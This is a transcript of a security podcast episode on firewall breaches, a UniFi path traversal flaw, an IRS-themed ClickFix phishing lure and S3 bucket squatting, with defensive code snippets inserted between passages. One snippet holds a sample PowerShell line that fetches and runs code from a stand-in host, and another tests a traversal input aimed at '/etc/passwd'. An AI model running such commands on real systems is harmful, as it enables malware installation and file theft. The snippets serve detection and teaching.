[01:51:42] The point Amazon is making is that if there is no defense in depth, if everything relies upon that single point which could fail and we see keeps failing, an organization's security perimeter could be breached even if they did absolutely nothing wrong.

[01:52:07] During that at least five-week interval, any fully patched and fully up-to-date Cisco firewall could have been successfully breached through no fault of their IT managing staff. Unfortunately, this is not what we normally see.

[01:52:29] We are usually noting that lax and lazy and inattentive IT was at fault, at least at fault, for not keeping their equipment up to date. Right? Like if patch was available months ago and they still hadn't got around to updating. But not so this time.

[01:52:52] As Amazon reminds us, defense in depth is needed because it's never safe to depend entirely upon any single security control. Anytime any management portal is exposed to the entire global internet where access is controlled by some form of authentication,

[01:53:14] the security of the entire organization now rests upon that single point which could fail. And that state of affairs would be acceptable if nothing more could be done. Right? If we've done everything and we still have a single point of failure, if nothing more could be done, then okay. I guess that's the best we can do.

[01:53:41] But it is almost always the case that additional parallel protections could be erected so that, for example, almost no one is even able to see that possibly vulnerable authentication interface.

[01:54:00] No one in China, no one in North Korea, no one in Iran, no one in Russia can even get to it, because there's port filtering that blocks their access to that authentication interface. Unless you really need everybody in the world to be able to guess your password, don't give them the opportunity. So then arguably, you said in this case, the IT did everything right.

[01:54:29] But it seems like you are also arguing that they didn't because doing everything right would also mean that you have security in depth. Right. Yeah. So that's a very good point. What I meant was IT was at least keeping everything patched. Got it. But this demonstrates that even keeping everything patched is really no longer enough. You need other layers.

[01:54:55] And if somebody had other layers, although you wouldn't want to be lax on patching, even being lax, like being a few weeks or months late, well, you wouldn't get infected because bad guys couldn't even attempt to infect your system.

[01:55:14] So really, you know, the jargon that I've been using most recently, that I used at Zero Trust World and before, was really bringing stronger meaning to least privilege. You want least privilege to apply.

[01:55:37] Why? It is a privilege if someone in China has the opportunity to guess your password. Why? Why have you given Chinese attackers the privilege of doing that? They shouldn't even be able to see that you have a management interface. You know, they should be blocked by simple IP-based filtering. And it's so easy to do.
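A minimal sketch of the kind of IP-based filtering being described, using Python's ipaddress module; the allowed range shown is a placeholder documentation prefix, not a real deployment:

```python
import ipaddress

# Hypothetical allowlist: only the trusted management range may even
# reach the portal's login page. 203.0.113.0/24 is a reserved
# documentation prefix standing in for your real VPN range.
ALLOWED = [ipaddress.ip_network("203.0.113.0/24")]

def may_reach_portal(src_ip: str) -> bool:
    """Return True only if the source address is inside an allowed net."""
    addr = ipaddress.ip_address(src_ip)
    return any(addr in net for net in ALLOWED)

print(may_reach_portal("203.0.113.7"))   # True: inside the trusted range
print(may_reach_portal("198.51.100.9"))  # False: never sees the login form
```

In practice this check lives in a border firewall or router ACL rather than application code, but the logic is exactly this: attackers outside the allowed ranges never get the "privilege" of seeing the authentication interface at all.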

[01:56:02] But everyone says, oh, look, Cisco, you know, they have, you know, we, oh, we got security. No, your security needs security. I like that. That's a shirt for Security Now: your security needs security. OK, so finally, before we talk about listener feedback, I just did want to mention that Cisco is not alone. Last Wednesday, and then updated on Saturday,

[01:56:31] Ubiquiti released a security update to patch a critical flaw. Also one of the rare ones, you know, it used to be that CVSS 10.0s were rare, right? Nobody had them. Like the worst you would see was a 9.8. And we would joke about, oh, you've got to try real hard to get up to a 10.0. Well, unfortunately, Cisco has put the lie to that because they're getting them all the time now. In this case, so did Ubiquiti.

[01:56:58] A CVSS 10.0 was discovered in its UniFi internet gateway and Wi-Fi management application. The flaw enabled a path traversal exploit that could allow threat actors to access the device's configuration files, which is never good, and take over UniFi gateways that way. So Ubiquiti UniFi users are advised to update. I know we've got a bunch of Ubiquiti and UniFi users.
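For context on what a path traversal flaw exploits, here's a hedged sketch of the check a web interface should perform before serving a requested file; the base directory is hypothetical, not Ubiquiti's actual layout:

```python
from pathlib import Path

# Hypothetical configuration root for a gateway's web interface.
BASE = Path("/var/lib/gateway/config").resolve()

def safe_config_path(user_supplied: str) -> Path:
    """Resolve the requested file and reject anything escaping BASE."""
    candidate = (BASE / user_supplied).resolve()
    if not candidate.is_relative_to(BASE):
        raise ValueError("path traversal attempt blocked")
    return candidate

print(safe_config_path("site.json"))         # stays inside the config root
try:
    safe_config_path("../../../etc/passwd")  # classic traversal payload
except ValueError as e:
    print(e)  # path traversal attempt blocked
```

A vulnerable handler skips the resolve-and-compare step and concatenates the user's string directly onto the base path, so a request full of `../` segments walks right out of the intended directory.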

[01:57:28] Leo is a big proponent. He's one of them. So everybody should update. Okay. Some listener feedback. Vern Mastel said his email had the subject Clocks, Cursive, and Coding with AI. And he wrote, Steve, we already have many children who cannot tell time on an analog clock.

[01:57:55] Many school systems began phasing out cursive writing a decade or more ago. In another generation, the ability to read and write cursive will fall into the category of arcane skills understood and practiced by only grizzled old professors in dusty, cluttered offices. He said, for decades, we've been teaching students how to code. With advances in AI, it seems clear that this too will cease.

[01:58:24] Why bother when you can have an AI bang out apps in minutes? It seems likely that in the near future, old school style programming will also become an arcane skill known and understood by only a few. I have to agree.

[01:58:44] I think we're very clearly seeing that actually writing code will change into managing its authorship by AI devices. That clearly seems to be where we're headed. And I remind everyone, what we have today is not what we're going to have tomorrow. It's going to be getting way, way better.

[01:59:09] Jeffrey Koh wrote, hey, Steve, since it's getting close to tax time, I thought you might enjoy seeing the IRS version of the ClickFix exploit. And he said, I blurred out the script. He said, I'm a longtime listener, every episode, Spinrite owner. Regards, Jeffrey D. Koh.

[01:59:30] So, and he attached in his email a picture of an Internal Revenue Service, Department of the Treasury letter, sent from Austin, Texas with their zip code. It's letter number 1058. And it says, final notice. Notice of intent to levy and notice of your right to a hearing. Addressee, Jeffrey. And then we have a case ID.

[01:59:59] And it says, you must respond within seven, parens, numeral seven, calendar days. Your account has been selected for an office examination. Internal Revenue Code Section 7602 authorizes the IRS to require you to appear and provide records. We've identified a mismatch between the income on your tax return and data received from payers.

[02:00:27] Ooh, 1099s that you didn't report. That's never good. To resolve this matter, you must appear at an IRS location. Receipt of this notice must be acknowledged using the secure method below so we can schedule your appointment. Non-acknowledgement will be deemed a failure to respond. This notice does not contain clickable links. Acknowledgement may only be made via the secure method indicated.

[02:00:57] And now we have the increasingly familiar and unfortunately increasingly successful ClickFix variant. It says, in a separate boxed callout: acknowledgement required. Step one, hold the Windows and R keys together to open Run.

[02:01:19] Step two, type or paste the acknowledgement code from the box below into the open field. Step three, press enter. We will then assign your appointment. And then it provides, in a box down below, the acknowledgement code, which starts out reading PowerShell, space, quote. And then we have something that Jeffrey blurred out.

[02:01:48] Then we have forward slash IRS and then a space, vertical bar, space, IEX, and then a close quote. So, again, as we know, this succeeds because so few people actually understand how Windows works. There are users who basically follow scripts of various forms.
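For anyone who wants to recognize the shape of these lures, here's a rough illustrative pattern, not a production detector, that flags the PowerShell-pipe-to-IEX construction just described; the URL is a made-up stand-in for the portion Jeffrey blurred out:

```python
import re

# Flag Run-box payloads that invoke PowerShell and pipe something into
# IEX (Invoke-Expression), which executes whatever text arrives.
CLICKFIX = re.compile(r"powershell\b.*\|\s*iex\b", re.IGNORECASE | re.DOTALL)

samples = [
    'powershell "irm https://evil.example/IRS | iex"',  # ClickFix-style
    "notepad.exe",                                      # benign
]
print([bool(CLICKFIX.search(s)) for s in samples])  # [True, False]
```

The takeaway for users is simpler than any regex: no legitimate organization will ever ask you to press Windows+R and paste a command.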

[02:02:14] And this latest trend of ClickFix to me is truly frightening. We've learned and previously reported that more than half, I think it was 52 percent, of all exploits combined are now attributable to this single category of ClickFix-related social engineering attacks. More than half of all successful attacks.

[02:02:42] And even before we had this number, it was clear just looking at them that these attacks, which leverage the user's lack of true understanding of how their PCs operate, would turn out to be devastating. So, Jeffrey, thanks for sharing that. Jim Housley wrote, listening to SN 1070 from March 17th. So that's last week. You were talking about properly signed malware.

[02:03:09] And you commented about how the certificate had to be in an HSM, you know, hardware security module. He said, however, in the previous two or three weeks, when you were talking about the current options for you to get a new certificate, you mentioned that signing in the cloud was becoming an option and seemed to be preferred by the CAs.

[02:03:31] With cloud-based signing, isn't it possible to share or steal access to the cloud account to use someone else's certificate? Long time listener since episode one, Spinrite owner. Thanks, Jim. In a word, yes, you are 100 percent correct, Jim.

[02:03:51] Once code signing is moved into the cloud, then we introduce the whole new specter of remote network authentication into the code signing domain. And has there ever been any trouble with authenticating who people are over a network? Yeah.

[02:04:44] That's where mine is. And it has never suffered a break-in. So I think old-school physical security is a little better than allowing, you know, foreign attackers from states we don't trust free-roaming access, trying to impersonate us and get our code signed. I think Jim is exactly right.

[02:05:10] And finally, Michael wrote, hey, Steve, you're not alone in your love of coding. Like you, I absolutely love writing my own code and solving problems myself. I don't care if I'm not as fast as AI as long as I am fast enough to achieve my own goals. And like you, I'm writing professional software. It's not just a hobby. And like you, I'm a one man team and my own boss. Consider this analogy.

[02:05:40] Many fishermen buy their poles and lures at Walmart, which is fine. But there exists a small subset of fishermen who make their own lures. And I'll bet you would, Mikah, because you're a craftsperson. I was going to say, ooh, this sounds fun. Who make their own lures because they're craftsmen who love the craft.

[02:06:07] And the experienced ones produce much better lures than the machine assembled ones available at Walmart. I suspect your code is the same. And I'd much rather buy software like Spinrite from you, which I know has had your full attention and 30 years of maturation, than ask Claude to write a cheap knockoff.

[02:06:35] Just like I'd much rather write my own software, you know, make my own lures, essentially, than cheat myself out of the joy of coding. That said, I do use Gemini to do the things I do not enjoy, like writing regular expressions. But even then, it makes mistakes that I often need to correct. Anyway, you keep on coding and know that you're not alone.

[02:07:06] Longtime listener and huge fan, Michael. And I like Michael's fishing lure analogy a lot. I think it clearly articulates the craftsmanship aspect of coding, which anyone who codes, you know, because they love it just for its own sake, would understand. So for me, AI producing code does not represent a worry or competition.

[02:07:36] You know, I've never been interested in coding in a production environment. I love that many more people than ever before are now finding themselves able to get their PCs to do things they never could before, because AI is able to create code for them, which does what they want. You know, to me, that's the greatest innovation so far on the AI coding front.

[02:08:03] And I'm sure that we, as I've said, we've only seen the tip of the iceberg. We've got lots more to come in upcoming years. Okay. And Mikah, that brings us to our final break before we talk about bucket squatting. What it is, what it means, and I don't know. I don't think you want to squat over a bucket. No, no.

[02:08:28] In fact, ever since the introduction of plumbing and the toilet, I don't need a bucket anymore. Totally. Anyway, well, let me take a moment here before we continue on with the show to tell you about Club Twit at twit.tv slash club twit. That is where you can go to sign up. $10 a month, $120 a year gets you access to the club. You can also use that QR code up in the top corner there. When you join the club, you gain access to some pretty awesome benefits. You get every single one of our shows ad-free, just the content.

[02:08:58] You also gain access to our special feeds. We have feeds that you will enjoy, including our feed that has our kind of behind the scenes before the show, after the show. We have a feed that has our live coverage of tech news events. We also have a feed that has our special Club Twit shows, like what was alluded to a couple of times here, my crafting corner. We have Stacey's Book Club. We have so many good things there in the club.

[02:09:26] And if that's not enough, well, can I also invite you to join our Discord, a fun place to go to chat with your fellow Club Twit members and those of us here at Discord. Excuse me, those of us here at Twit. We would love to have you. So head to twit.tv slash club twit to check it out. Can't wait to welcome you into the fold. All right. Back from the break. I've got my bucket. My legs are ready. Tell us all about it. Okay.

[02:09:55] A little over a year ago, back in February 2025, so 13 months ago, watchTowr Labs posted a troubling narrative that documented the degree to which the security of significant parts of the Internet has not been thoroughly thought through before being implemented.

[02:10:19] And it's not only new tech like, you know, the open source repositories that bad guys are constantly attacking and poisoning, or some AI that can be subverted. The greater lesson the past 21 years of security has taught over and over is that not only is security difficult, but we keep discovering that it's even more difficult than we thought. Or as we just recently noted, security needs to be more secure.

[02:10:49] One thing to fully appreciate is that only a portion of security failures result from bugs. Just as many failures are the result of inattention, oversight, and poor design, or what I often lump into the label of policy as opposed to mistakes.

[02:11:07] So this suggests that even after AI being used to improve our security has matured, as I'm sure it will, and it's able to help us far more strongly eliminate traditional exploitable bugs, that will not be the end of security woes, since even the misapplication of flawless technology can still result in serious consequences.

[02:11:35] So I don't see security as an issue being resolved by AI. So this brings us back to watchTowr Labs' exploration from February 2025. It's a perfect teaching example of the unintended consequences of a system's poor design. watchTowr's posting February before last was given the headline,

[02:12:02] 8 million requests later, we made the SolarWinds supply chain attack look amateur. So here's what they wrote back then. They said, surprise, surprise, we've done it again. We've demonstrated an ability to compromise significantly sensitive networks, including governments, militaries, space agencies,

[02:12:29] cybersecurity companies, supply chains, software development systems, and environments, and more. In November 2024, we decided, they wrote, to demonstrate the scenario of a significant internet-wide supply chain attack caused by abandoned infrastructure. I'll just pause to note that we've looked at problems with abandoned infrastructure before,

[02:12:57] where something has been set up and running and then, for whatever reason, you know, left behind. Pieces of it maybe have been taken away, but some pieces remain, and those end up being targets of abuse. So they said, this time, however, we dropped our obsession with expired domains, which, of course, is an example we've looked at before,

[02:13:26] and instead shifted our focus to Amazon's S3 buckets, thus bucket squatting. They said, it's important to note that although we focused on Amazon S3 for this endeavor, this research challenge, approach, and theme is cloud provider agnostic and applicable to any managed storage solution. Amazon's S3 just happened to be the first storage solution we examined,

[02:13:56] and we're certain this same challenge would apply to any customer organization usage in any storage solution provided by a cloud provider. The TLDR is that we ended up discovering around 150 Amazon S3 buckets that had been used across commercial and open source software products,

[02:14:26] governments, and infrastructure deployment and update pipelines before they were abandoned. They said, so we registered those abandoned buckets to see what would happen.

[02:14:51] The question was, how many people might be attempting to request software updates from S3 buckets that appear to have been abandoned months or even years before? Wow. At the start of this, we had no idea how this would turn out. The research panned out progressively with S3 buckets registered as they were discovered.

[02:15:19] It went rather quickly from, aha, we could put our logo on this website to .mil? We should probably speak to someone about that. Oh, my God. They said, after spending around $400, as in only $400, on S3 CloudTrail and CloudWatch logs querying,

[02:15:47] we had some results worth talking about. When creating these S3 buckets, we enabled logging, allowing us to track who requested files from each S3 bucket via the source IP address and what they requested, the file name, the path, and the name of the S3 bucket itself. Collectively, these S3 buckets received more than 8 million.

[02:16:15] Are you kidding me? 8 million HTTP requests over a two-month period for all sorts of things. Those making the queries for whatever it was that used to be there were requesting all sorts of things. Software updates, pre-compiled, unsigned Windows, Linux, macOS binaries,

[02:16:45] virtual machine images, JavaScript files, CloudFormation templates, SSL VPN server configurations and credentials, and more. Had we been maliciously inclined, we could have responded to each of these 8 million requests with something malicious, like a nefarious software update,

[02:17:10] a CloudFormation template that gave us access to an AWS environment, virtual machine images backdoored with remote access tooling, binaries that deployed remote access tooling, scary ransomware, or such, and so forth, to give us access to the requesting system or network that the requesting system was within, and in some cases, .mil.

[02:17:38] They wrote, these many millions of incoming give-me-this-file requests came from the networks of organizations based on DNS Whois lookups that included government networks in the USA, including NASA, numerous laboratories, state governments, etc., the UK, Poland, Australia, South Korea, Turkey, Taiwan, Chile, and more.

[02:18:06] Then there were military networks, and the networks of Fortune 500s, Fortune 100s, a payment card network, a major industrial product company, global and regional banks and financial services organizations, universities around the world, instant messenger software companies, cybersecurity technology companies, casinos, and more.

[02:18:32] We want to take this opportunity to give our sincere thanks, they wrote, to the entities who engaged with us when we realized what we'd stumbled into, including the UK's NCSC, who helped with introductions to the correct teams for us to speak to, AWS, who took those around 150 S3 buckets off our hands to sinkhole.

[02:19:01] A major unnamed SSL VPN appliance vendor, who worked with us very quickly and directly to take relevant S3 buckets off our hands. And CISA, who very quickly remediated an example that affected CISA.gov. Wow. Yeah.

[02:19:24] AWS's agreement to sinkhole the identified S3 buckets means that the release of this research does not increase the risk exposed to any party. The same issues discussed in this research could not be recreated against the same specific S3 buckets, thanks to the sinkholing performed by the AWS team.

[02:19:46] We believe that in the wrong hands, the research we performed could have led to supply chain attacks that outscaled and outimpacted anything we as an industry have seen so far. As an industry, we spend a lot of time trying to solve issues like securing the supply chain in as many complex ways as possible,

[02:20:10] while still completely failing to cover something as simple as make sure you don't take candy from strangers, unquote. Okay, so their posting then delves into the specific details about each of these many extremely embarrassing and potentially explosive exposures. To best understand how the industry got into this mess,

[02:20:36] we need to talk a bit about Amazon's somewhat astonishing AWS S3 bucket naming. First of all, a so-called bucket is nothing special. It's just Amazon's name for a cloud-based directory that can hold files.

[02:21:00] The name S3 itself, you know, that's three S's, right? It stands for Simple Storage Service. And simple is exactly what it is. The simplicity of Amazon's Simple Storage Service likely accounts for much of its, you know, early success and popularity.

[02:21:27] But it may also have contributed to the service's very spotty security record. I mean, there have been lots of problems with exposed AWS S3 buckets in the past. What's perhaps most shocking about Amazon's S3 bucket naming is that access to any S3 storage bucket is via an HTTP URL

[02:21:54] that ends with the standard web domain S3.amazonaws.com. And surprisingly, that ending can be prefixed with anything that looks like a valid World Wide Web domain name having between three and 63 characters, because that's exactly what it is.

[02:22:23] For example, I have an Amazon bucket named GRC. That's right. The bucket's name is GRC, which means that the bucket's full name is GRC.s3.amazonaws.com. And that bucket can be accessed by anyone, anywhere in the world at any time. And if that seems like a terrifying thing, you'd be correct to think that.
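To make the flat naming scheme Steve describes concrete, here's a minimal sketch of how a virtual-hosted-style S3 URL is formed from nothing but the bucket name. The key path in the second call is purely hypothetical, just to show the shape:

```python
def bucket_url(bucket: str, key: str = "") -> str:
    # Any S3 bucket is reachable at <bucket-name>.s3.amazonaws.com;
    # the bucket name is simply prepended as a DNS label.
    return f"https://{bucket}.s3.amazonaws.com/{key}"

# Steve's example bucket (actual bucket names are lowercase):
print(bucket_url("grc"))                     # https://grc.s3.amazonaws.com/
print(bucket_url("grc", "updates/app.bin"))  # hypothetical key path
```

That DNS-label construction is exactly why the name must look like a valid domain label: the bucket name literally becomes part of a hostname.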

[02:22:52] The only thing that even begins to make this system safe is access controls. So, of course, I have extremely strong access control security policies set on that bucket so that only I am able to work with it. But we've seen many examples where someone mistakenly, though presumably at some point for some purpose deliberately,

[02:23:21] allowed global read or read-write access to one of their S3 buckets, and disaster soon followed. That shouldn't even be an option, right? Like, why would anyone ever want... Well, read-write, I would agree, although you might want people to be able to put information up, like to submit things to you. And certainly, if you were, for example, a certain SSL VPN appliance vendor,

[02:23:51] you might want to have your appliance querying that S3 bucket by name, whatever name you've given it, to pull down updates or security configuration improvements or something. So you're basically using it like a globally accessible CDN, a content delivery network. So, actually, that's how many people use it. So, okay, as a consequence, I have a bunch of S3 buckets

[02:24:20] with many wonderful, simple, and fun names since I got there early and I grabbed them. Assignment of S3 bucket names could not be any simpler. It's as simple as first come, first serve, like Twitter handles were back in the day. If you attempted to create a bucket, which is always by name,

[02:24:45] that effort will succeed if that name is not currently assigned to anyone else's bucket. So, I have GRC, and that name is exclusively mine until I delete it. And as long as I have it, no one else can have it.

[02:25:08] In computing, this is known as a global namespace, a single shared naming space where every name must be unique. So, this means that everyone in the world shares the same naming space. There's only one Amazon S3 namespace that everyone shares to name any and all

[02:25:36] of the S3 buckets they may have created. And governed by whatever access controls its owner may have configured, any S3 bucket is accessible by its name simply by appending .s3.amazonaws.com to the end of it. For the sake of thoroughness, I'll add that S3 bucket names

[02:26:02] must be between 3 and 63 characters total. They must always be lowercase alpha from a through z or a numeric digit, 0 through 9. You can also have dots and hyphens. So, just like domain names. They also must begin and end with a letter or a number, meaning they cannot begin or end with dashes,

[02:26:31] and they cannot contain a pair of adjacent dots. There are also a bunch of specially reserved prefixes and suffixes that Amazon has, for things like punycode, in order to support a larger spelling alphabet.
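The naming rules just described can be captured in a small validator. This is a sketch of only the rules mentioned in the show (length, character set, endpoints, adjacent dots); Amazon's full rule set, including the reserved prefixes and suffixes Steve alludes to, is longer:

```python
import re

def is_valid_bucket_name(name: str) -> bool:
    """Check the S3 bucket naming rules described above (not Amazon's full list)."""
    if not (3 <= len(name) <= 63):              # 3 to 63 characters total
        return False
    if not re.fullmatch(r"[a-z0-9.-]+", name):  # lowercase letters, digits, dots, hyphens only
        return False
    if not (name[0].isalnum() and name[-1].isalnum()):  # must begin and end with letter/digit
        return False
    if ".." in name:                            # no adjacent dots
        return False
    return True

print(is_valid_bucket_name("grc"))         # True
print(is_valid_bucket_name("-bad-name-"))  # False: begins and ends with a hyphen
```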

[02:26:55] But overall, anything that anyone wishes to use will be valid within those guidelines. And notice that I keep saying "any bucket that isn't currently in use by someone." The point here, and this is where things get somewhat sticky, is that buckets that are no longer needed by their owner can be deleted. Two things occur when that happens.

[02:27:23] Whatever content they may have contained will be deleted and the bucket's name, which will then no longer be in use by its original owner, will be released and returned to the available bucket pool and become available for use by anyone who wishes to have it by name. So, now we see what these watchTowr guys did.

[02:27:51] They created some form of directed brute force Amazon S3 bucket scanner, which they used to search for named buckets that once existed, but which were then deleted by their original creators. The problem was that many widespread automated tools, software update systems,

[02:28:19] CloudFormation templates, virtual machine images, even executable program downloaders, continued attempting to access the content within those previously deleted buckets. So, when these researchers discovered and recreated one of these previously deleted buckets and began logging the failed file access attempts,

[02:28:49] they were able to quickly learn what resource something somewhere was attempting to obtain from that bucket. The danger of this is obvious and truly horrifying, given that they could see what it was that was being requested, they could readily choose to return whatever malicious content of that form they might wish.
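The researchers' actual scanner tooling isn't described, but a commonly observed S3 behavior is that an unauthenticated request to a bucket's URL answers 404 (NoSuchBucket) when nobody owns the name, 403 when the bucket exists but is private, and 200 when it exists and is public. A hypothetical classifier for such probe results, just to illustrate the squattable case:

```python
def classify_probe(status: int) -> str:
    # Interpret the HTTP status of an unauthenticated GET/HEAD against
    # https://<name>.s3.amazonaws.com/ (commonly observed S3 behavior).
    if status == 404:
        return "unclaimed"      # NoSuchBucket: the name could be (re)registered
    if status == 403:
        return "taken-private"  # bucket exists, access denied
    if status == 200:
        return "taken-public"   # bucket exists and is publicly readable
    return "unknown"

# A bucket name that software still references but that probes as 404
# is exactly the squattable, previously deleted case:
print(classify_probe(404))  # unclaimed
```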

[02:29:16] Since these requests were being made over TCP connections, the true IP address of the entities making the requests could be determined. Remember, they wrote, these many millions of incoming give-me-this-file requests came from the networks of organizations that included, you know, government networks in the USA, NASA, laboratories, state governments, etc.

[02:29:43] The UK, Poland, Australia, South Korea, Turkey, Taiwan, Chile, and more. You know, on and on. Universities, instant messaging software companies, cybersecurity technology companies, casinos, and more. Credit card processing companies, you know, you name it. So, this is not the result, and this is the key. This is not the result of a bug. This was the result of a fundamentally poor system design.

[02:30:14] Amazon should never have allowed bucket names to be recycled and reused. And in fact, right now, they ought to take any which were ever in use and sinkhole them. Just take them offline. And really, when you think about it, bucket names are really just vanity, right? They're like license plates. Yeah, that's what I was thinking. Yeah, it doesn't matter. They're like license plates.

[02:30:43] All you really need is something random and unique that's yours. It doesn't need to be your name, your initials, or some cutesy expression. But when users are given a choice, they'll tend to create bucket names that are meaningful to them. And that likely means they could be guessed by someone else. You know, anybody could guess I might have GRC. Well, I do. So, yeah. And I'll admit it.

[02:31:12] I'd rather have GRC than 092D7630B5F. You know? Much sexier. But since S3 buckets are almost always accessed by automation, names were really never even necessary. They were just for fun. But that fun comes at a cost. Since Amazon chose to give us control over our bucket names,

[02:31:39] they should have appreciated the inherent problem with reuse and made them single use from the start. Once taken can never be used again. Okay. I have GRC. And that should be it forever. But it probably won't be. Unless they change their policy, which after all, they could at any time. My use of GRC, those three initials, will eventually end. Because I will eventually end.

[02:32:09] You know? Whether I do it deliberately or not, I'll cancel my longstanding AWS account or it'll be canceled posthumously. At that time, the account's data will be deleted. And the GRC bucket, the bucket name GRC, you know, will be recycled back into the available pool, ready to be used again by someone.

[02:32:33] I have only ever used S3 as an off-premises encrypted storage archive. The danger for me has never been present. You know? There's nothing for anybody to ask for. But the guys at watchTowr discovered that many S3 users are using, or once used, their S3 buckets as a form of CDN to deliver quite sensitive files.

[02:32:56] Both Microsoft Azure and Google Cloud have long provided protections against the inherently dangerous practice of recycling bucket names within a single global namespace, which enables this form of bucket squatting, as it's appropriately been called. But Amazon has been slow to come around.

[02:33:26] You know, change is always difficult. But the good news is, and the reason we're talking about this today, is that last Thursday, at long last, that finally changed. Amazon's announcement carried the headline, Introducing Account Regional Namespaces for Amazon S3 General Purpose Buckets. And they wrote the following. Short. It's just quick. They said,

[02:33:53] Today, we're announcing a new feature of Amazon Simple Storage Service, Amazon S3, you can use to create general purpose buckets in your own account regional namespace, simplifying bucket creation and management as your data storage needs grow in size and scope.

[02:34:19] You can create general purpose bucket names across multiple AWS regions with assurance that your desired bucket names will always be available for you to use. And that last phrase, with assurance that your desired bucket names will always be available for you to use, reminded me of another aspect of the single global namespace problem,

[02:34:46] which is that no one owns anything about any not yet created bucket names. You know, the Amazon S3 namespace is flat, as I said, not hierarchical. If I own the domain, as I do, grc.com, then I also automatically own all subdomains and host names of grc.com.

[02:35:13] www.grc.com and forums.grc.com and noodles.grc.com. They're all automatically mine. We would say that everything under grc.com is mine. But, you know, under only applies because the domain name system is an inherently hierarchical namespace.

[02:35:39] There's no under in any flat namespace such as S3 has always used. So, for example, you know, say that an organization had the practice of saving their annual archives into a series of buckets named Acme Enterprises Archive 2024.

[02:36:01] Then the next year, Acme Enterprises Archive 2025 and so on, where the year obviously is incremented successively. If some begrudging ex-employee, you know where we're going, wished to cause their ex-employer Acme Enterprises some grief,

[02:36:25] nothing prevents them, the ex-employee, from opening an Amazon S3 account, which costs nothing, and creating the bucket Acme Enterprises Archive 2026. Now, at the end of this year, when Acme Enterprises went to create their succeeding year's archive bucket, that attempt would fail because someone else had beaten them to it.

[02:36:52] Having a single global namespace shared by every S3 user may have once seemed simple and maybe even fun, but there's a better way. So, Amazon's introduction of what they're now calling account regional namespaces is a long-needed addition. Their announcement continues to explain this, writing,

[02:37:13] With this feature, you can predictably name and create general-purpose buckets in your own account regional namespace by appending your account's unique suffix to your registered bucket name. For example, the bucket named ourbucket-123456789012-us-east-1-an.

[02:37:43] Okay, not particularly sexy, but okay. That would exist in an account regional namespace. They said ourbucket is the bucket name prefix specified. Then we add the account regional suffix to the requested bucket name, which is that -123456789012-us-east-1-an.

[02:38:10] If another account tries to create buckets using this account suffix, and Lord, why would they? Their requests will be automatically rejected. So, that's the good news. You get protection against somebody trying to create a bucket with your specific account number suffix. They finish saying your security teams can use AWS identity and access management policies
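Based on the announcement's sample name, the new scheme can be sketched as: the caller picks a prefix, and the account-plus-region suffix is pinned onto it. Treat the exact trailing token ("an") as an assumption taken from their one example, not a published grammar:

```python
def regional_bucket_name(prefix: str, account_id: str, region: str) -> str:
    # Append the account regional suffix, modeled on Amazon's sample
    # "ourbucket-123456789012-us-east-1-an"; the trailing "-an" token
    # is assumed from that example.
    suffix = f"-{account_id}-{region}-an"
    name = prefix + suffix
    if len(name) > 63:  # the overall 63-character bucket name limit still applies
        raise ValueError("prefix too long once the account regional suffix is added")
    return name

print(regional_bucket_name("ourbucket", "123456789012", "us-east-1"))
# ourbucket-123456789012-us-east-1-an
```

Note how the fixed 26-character suffix eats into the 63-character budget, which is part of why Steve calls the implementation something of a kluge.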

[02:38:40] and AWS Organizations service control policies to enforce that your employees are only able to create buckets in their account regional namespace. This will help teams adopt the account regional namespace across your organization. Okay, so I would argue that the implementation of this is something of a kluge.

[02:39:07] The total length of the bucket name prefix plus the regional account suffix is limited to 63 characters. So, they've really only done two things. First, any bucket created while this new policy is enabled must end in the proper account number regional suffix.

[02:39:33] Second, that account number regional suffix is now reserved for employees using that account number. So, no one else can create a bucket which uses that suffix. And I guess a third thing they've done is they've allowed you to set policies.

[02:39:53] They've, you know, upper management, the IT overlords can set policies that require all new buckets created to use this account regional namespace suffix. So, they finally address this problem. Notice that it is incumbent on the organization to turn this on. Right. This doesn't do anything retroactively.

[02:40:23] All of that is still a problem. That is, non-regional suffix buckets presumably still exist and work; only newly created ones are covered. So, this is just enforcing a new bucket creation naming policy on future bucket creation. So, unless Amazon also decides to prohibit the recycling of previous bucket names,

[02:40:53] and they ought to immediately, you know, blacklist any that have been abandoned right now, they're still doing nothing to prevent bucket squatting on earlier buckets, which these guys may not have found. They had to do some sort of brute force scanning to find all of these buckets. There are probably other buckets that still exist that have not been found.

[02:41:19] So, you know, the good news is if organizations adopt and enable this enforced account number regional suffix bucket naming, then at least going forward, the problem will have been prevented. And that is bucket squatting. That is far more terrifying than I thought it was going to be based on the name, I will say that. That's pretty prevalent across the web.

[02:41:48] And the fact that they- It's frightening how widespread this is. There's a level of creativity among security researchers that I really find to be quite incredible. When sometimes you'll be talking about these different exploits and ideas, and I think about the thinking required to get to that end point, right?

[02:42:13] And it's, you know, despite being on its face a more practical, more sort of scientific approach, there's a lot of creativity that's involved in the work that you all do. And I think that that's something that really stands out to me at these times because I just, yeah, you have to think about the different tools that we use that are out there, and then go, as you like to say, what could possibly go wrong?

[02:42:43] And that list can be hundreds of thousands of things. And you just highlight the one. Oh yeah, let's check this. Let's see if that works. This is just a cool thing to think of, but it's a terrifying outcome whenever it turns out to be true, right? Yeah. Yeah. We're still just, on one hand, I think we're dragging legacy design and policy forward.

[02:43:10] And it's also the case that, I mean, AWS was created after the internet was already mature, as a cloud-based service. Yet these guys didn't stop to think, well, what if somebody uses automated agents to pull code from buckets, like firewalls or SSL VPN

[02:43:35] appliances that they're checking for new firmware, and then they go out of business or they decide, we don't like this bucket, we're going to move that in-house. But there's all this equipment out there that is still pulling from a bucket, which has been abandoned, but some bad guy could then register and provide their own download for all this equipment to download. I mean, this is a real problem. Yeah.

[02:44:04] They actually proved it to be a real problem. Yes. Yeah. And that's terrifying. I'm glad that it's, you know, again, we're shining a light on it. That's the first step. And it's the good guys who are finding it and not the bad guys, because it could be exploited. Unfortunately, there appear to be no lack of problems that the bad guys are finding and exploiting too. There are always so many things on that list that we talked about earlier.

[02:44:31] So, Steve, I'm glad that you have your eye on the prize and that others out there are paying attention as well. Well, this has been Security Now. The show publishes every Tuesday. Twit.tv slash SN is where you go to find the show. Heading there gives you access to the audio and video versions of the show.

[02:44:55] You can, of course, check out grc.com where you will find all sorts of good things. It's also where you can go to make sure that you are part of the email subscriptions and to send Steve email as well. And, of course, it's the place where you can go to get Spinrite, Steve's bread and butter, plus the DNS benchmark. That's available now, right?

